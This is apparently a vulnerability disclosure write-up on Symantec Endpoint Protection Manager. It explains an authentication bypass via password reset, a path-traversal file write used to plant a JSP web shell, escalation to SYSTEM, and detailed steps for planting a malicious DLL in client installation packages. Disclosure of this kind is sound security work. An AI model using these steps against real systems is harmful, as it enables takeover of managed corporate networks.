SEPM uses sessions after the initial authentication. User information is stored in an AdminCredential object, which is associated with the user's session. Assigning the AdminCredential object to a session is implemented in the setAdminCredential method of ConsoleSession, which in turn holds an HttpSession object.
This setAdminCredential method is only called at two points within the whole application: once in the LoginHandler and once in the ResetPasswordHandler.
Its purpose in LoginHandler is obvious. But why is it used in the ResetPasswordHandler? Let's have a look at it!
Password reset requests are handled by the ResetPasswordHandler handler class. The implementation of the handleRequest method of this handler class can be observed in the following listing:
After the prologue in lines 72-84, the call to the init method calls the findAdminEmail method for looking up the recipient's e-mail address.
Next, the getCredential method is called in line 92 to retrieve the AdminCredential object of the corresponding administrator. The AdminCredential object holds information on the administrator, e. g., if it's a system administrator or a domain administrator as well as an instance of the SemAdministrator class, which finally holds information such as the name, e-mail address, and hashed password of the administrator.
The implementation of the getCredential method can be seen in the following listing:
Line 367 creates a new session, which effectively results in issuing a new JSESSIONID cookie to the client. In line 368, the doGetAdminCredentialWithoutAuthentication method is called to get the AdminCredential object without any authentication based on the provided UserID and Domain parameters.
Finally – and fatally –, the looked up AdminCredential object is associated to the newly created session in line 369, making it a valid and authentic administrator's session. This very session is then handed back to the user who requested the password reset. So by requesting a password reset, you'll also get an authenticated administrator's session!
An example of what a request for a password reset for the built-in system administrator 'admin' might look like can be seen in the following listing:
And the response to the request:
The response contains the JSESSIONID cookie of the newly created session with the admin's AdminCredential object associated to it.
Note that this session cannot be used with the Web console as it is missing some attribute required for AjaxSwing. However, it can be used to communicate with the other APIs like the SPC web services, which, for example, allows creating a new SEPM administrator.
CVE-2015-1487: SEPM Arbitrary File Write
The UploadPackage action of the BinaryFile handler is vulnerable to path traversal, which allows arbitrary files to be written. It is implemented by the BinaryFileHandler handler class. Its handleRequest method handles the requests and the implementation can be observed in the following listing:
Handling of the UploadPackage action starts at line 189. The PackageFile parameter value is used as the file name and the KnownHosts parameter value as the directory name. Interestingly, the provided directory name is checked for path traversal by looking for the directory separators '/' and '\' (see line 196, possibly related to CVE-2014-3439). However, the file name is not, which still allows specifying an arbitrary file location.
The following request results in writing the given POST request body data to the file located at '[…]\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\exec.jsp':
Writing a JSP web shell as shown allows the execution of arbitrary OS commands with 'NT Service\semsrv' privileges.
CVE-2015-1489: SEPM Privilege Escalation
The Symantec Endpoint Protection Launcher executable SemLaunchSvc.exe is running as a service on the SEPM server with 'NT Authority\SYSTEM' privileges. It is used to launch processes that require elevated privileges (e. g., LiveUpdate, ClientRemote, etc.). The service is listening on the loopback port 8447 and SEPM communicates with the service via encrypted messages. The communication endpoint in SEPM is the SemLaunchService class. One of the supported tasks is the CommonCMD, which results in command line parameters of a cmd.exe call.
Since we are able to execute arbitrary Java code within SEPM's web server context, we can effectively execute commands with 'NT Authority\SYSTEM' privileges on the SEPM server.
CVE-2015-1492: SEP Client Binary Planting
The client deployment process on Windows clients is vulnerable to Binary Planting, an attack exploiting how Windows searches for dynamically loaded libraries when they are loaded via LoadLibrary by name only. If an attacker can place a custom DLL in one of the locations the DLL is searched for, it is possible to execute arbitrary code via the DllMain entry point function, which gets executed automatically on load.
Symantec Endpoint Protection is vulnerable to this flaw: During the installation of a deployment package on a Windows client, the SEP client service ccSvcHst.exe starts the smcinst.exe from the installation package as a service. This service tries to load several DLLs, e. g., the UxTheme.dll.
By deploying a specially crafted client installation package with a custom DLL, it is possible to execute arbitrary code with 'NT Authority\SYSTEM' privileges.
A custom installation package containing a custom DLL can be constructed and deployed in SEPM with the following steps.
Export Package
Download an existing client installation package for Windows as a template:
Go to 'Admin', 'Installation Packages'.
Select a directory where you want to export it to.
Select one of the existing packages for Windows and click on 'Export a Client Installation Package'.
Untick the 'Create a single .EXE file for this package'.
Untick the 'Export packages with policies from the following groups'.
Click 'OK'.
Modify Package
Tamper with the client installation package template:
Within the downloaded installation package files, delete the packlist.xml file.
Open the setAid.ini file, delete the PackageChecksum line, and increase the values of ServerVersion and ClientVersion to something like 12.2.0000 instead of 12.1.5337.
Open the Setup.ini file and increase the ProductVersion value accordingly.
Copy the custom DLL into the package directory and rename it UxTheme.dll.
Import and deploy Package
Create a new client installation package from the tampered files and deploy it to the clients:
Go to 'Admin', 'Installation Packages'.
Click 'Add a Client Installation Package'.
Give it a name, select the directory of the tampered client installation package files, and upload it.
Click 'Upgrade Clients with Package'.
Choose the newly created client installation package and the group it should be deployed to.
Open the 'Upgrade Settings', untick 'Maintain existing client features when upgrading', and select the default feature set for the target group, e. g., 'Full Protection for Clients'.
Upgrade the clients by clicking 'Next'.
The loading of the planted binary may take a while, probably due to some scheduling of the smcinst.exe service.
Conclusion
We have successfully demonstrated that a centralized enterprise management solution like the Symantec Endpoint Protection suite is a critical asset in a corporate network as unauthorized access to the manager can have unforeseen influence on the managed clients. In this case, an exposed Symantec Endpoint Protection Manager can result in the full compromise of a whole corporate domain.